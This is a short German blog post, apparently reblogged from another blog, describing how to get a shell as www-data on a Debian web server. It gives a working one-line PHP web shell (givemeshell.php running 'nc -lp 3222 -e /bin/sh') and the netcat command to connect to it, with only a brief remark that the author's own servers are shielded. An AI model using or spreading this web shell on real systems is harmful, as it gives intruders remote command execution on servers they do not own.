Eine Datei namens givemeshell.php erstellen und auf den Webserver laden, die sollte so was wie
<?php system("nc -lp 3222 -e /bin/sh"); ?>
enthalten. Danach die Datei per Webbrowser aufrufen und dann lokal
netcat webserver 3222
aufrufen. Und schon hat man unter Debain (Ubuntu sicherlich auch) eine shell als www-data.
Ich hab den Artikel erst nur ueberflogen, wohl weil ich damals schon einen LB eingesetzt habe und die Apache Server alle gut abgeschirmt sind. Es ist immer wieder interessant wie schnell man einfache Barrieren umgehen kann.
via nion's blog
